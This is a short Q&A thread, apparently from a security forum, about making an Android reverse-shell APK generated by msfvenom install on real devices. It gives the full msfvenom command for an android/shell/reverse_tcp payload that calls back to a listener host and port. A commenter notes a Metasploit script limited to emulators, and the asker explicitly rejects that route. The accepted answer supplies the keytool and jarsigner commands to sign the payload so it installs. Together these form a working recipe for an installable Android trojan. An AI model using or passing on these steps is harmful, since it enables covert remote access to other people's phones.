4

This is for educational purposes only!

I'm trying to generate android payload using msfconsole payload standalone generator: msfvenom with the command: 

msfvenom -p android/shell/reverse_tcp LHOST=192.168.100.4 LPORT=4444 R > android_shell.apk

My problem is that the apk refuse to install on any android version "I tried 4.0 to 4.3" and it shows the message:

application not installed

What am I doing wrong? Is there some kind of signing for the apk file?

alecxe
  • 1,515
  • 5
  • 19
  • 34
Eibo
  • 2,485
  • 3
  • 19
  • 32
  • Have you tried tools/exploit/install_msf_apk.sh script? – void_in Nov 01 '15 at 11:21
  • can you provide a small explanation about this script please ? – Eibo Nov 01 '15 at 11:29
  • The payload generated by the msfvenom is self signed which means you need to check the "Unknown sources" option. Also, the script only installs the package to an emulator so you can use it for testing. – void_in Nov 01 '15 at 12:35
  • this is not an option, I need some solution to make the APK works on various android versions and not just an emulator – Eibo Nov 01 '15 at 14:11

1 Answers1

4

I've found my answer, referring to Signing Your Applications on Android developer, the apk needed to be signed.
However, I had to do it manually on Kali using the commands:

  • For generating the keystore:
    keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
  • For singing the App:
    jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore my_application.apk alias_name
Eibo
  • 2,485
  • 3
  • 19
  • 32